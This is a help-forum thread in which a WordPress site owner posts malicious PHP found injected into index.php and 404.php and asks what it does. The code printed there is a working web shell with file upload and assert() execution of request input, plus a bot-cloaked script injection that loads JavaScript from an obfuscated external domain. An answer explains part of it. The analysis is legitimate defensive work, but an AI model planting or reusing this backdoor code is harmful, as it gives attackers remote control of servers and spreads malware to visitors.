0

Here is the code injected to index.php

if(@isset($_GET[bots])){
    echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">';
    echo '<input type="file" name="file"><input name="golden" type="submit" id="golden" value="Done"></form>';
    if($_POST['golden']=="Done"){
        if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){
            echo'+';
        }else{
            echo'-';
        }
    }
}elseif(isset($_REQUEST['bot']))assert(stripslashes($_REQUEST[bot]));
else exit;

and here is the code injected to 404.php:

@ini_set('display_errors','off');
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0);
@ini_set('set_time_limit',0);
ignore_user_abort(true);
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
    @ini_set('upload_max_filesize','1000000');
    $size=$_POST['size'];
    $open_image=$_FILES['img']['name'];
    $open_image_tmp=$_FILES['img']['tmp_name']; 
    $image_tmp=$size.$open_image;
    @move_uploaded_file($open_image_tmp,$image_tmp);
    echo "<!-- 404-NOT-FOUND-IMG -->";
} else echo "<!-- 404-NOT-FOUND-ERROR -->";
$http_report_user = $_SERVER['HTTP_USER_AGENT'];
if ( @stripos ( $http_report_user, 'bot' ) == false and @stripos ( $http_report_user, 'google' ) == false and @stripos ( $http_report_user, 'yandex' ) == false and @stripos ( $http_report_user, 'slurp' ) == false and @stripos ( $http_report_user, 'yahoo' ) == false and @stripos ( $http_report_user, 'msn' ) == false and @stripos ( $http_report_user, 'bing' ) == false ) {
    $http_report = strtolower ( $_SERVER['HTTP_HOST'] );
    $wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
    $not_found_report = strrev ('=drowyek&');
    $not_found_page=str_ireplace('/','',$_SERVER['REQUEST_URI']);
    $not_found_page=str_ireplace('-',' ',$not_found_page);
    echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';
}?>

Please help me find where it started or the backdoor used to inject such malicious code. Also, can somebody tell me what that code does?

schroeder
  • 125,553
  • 55
  • 289
  • 326
Romeo M
  • 3
  • 2
  • ok am checking the link you have given for me to better understand what happen to my site – Romeo M Aug 08 '18 at 09:31
  • 1
    No one can tell you how they added the code by looking at the code itself. That's like asking how someone broke into a house by looking at a book they left behind. – schroeder Aug 08 '18 at 12:00

1 Answers1

0

There's a lot of obfuscation there, but these two lines stand out:

$wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
$not_found_report = strrev ('=drowyek&');

It looks as though they're trying to pull a script in from that site (essays-today). Presumably, that's a compromised domain they've found and exploited, and they're including that code into your site in order to propagate.

echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';

This line is taking the formed string in PHP, and printing it out as HTML. Note how it's doing that: the variables are all being entered into the tags inside <script>, so it's loading that compound string as a location for some Javascript. It's going to then run that external Javascript on your site.

Have you recently installed any new plugins to Wordpress? There are several with known security issues. It might be worth installing a 404 checking plugin. Any requests that your site receives that don't link anywhere will get displayed, so any requests to unsecure plugins will be displayed, along with the location the requests came from. It may not triage the situation, but it will be a good indication as to how and where you're being attacked from.

MK_Codes
  • 78
  • 5
  • thank you for this information. I will try this one... I know it's hard to pin point to where it came from (the backdoor) BUT it can give me clues and lead with the one you suggested. Thanks for your answer – Romeo M Aug 10 '18 at 00:14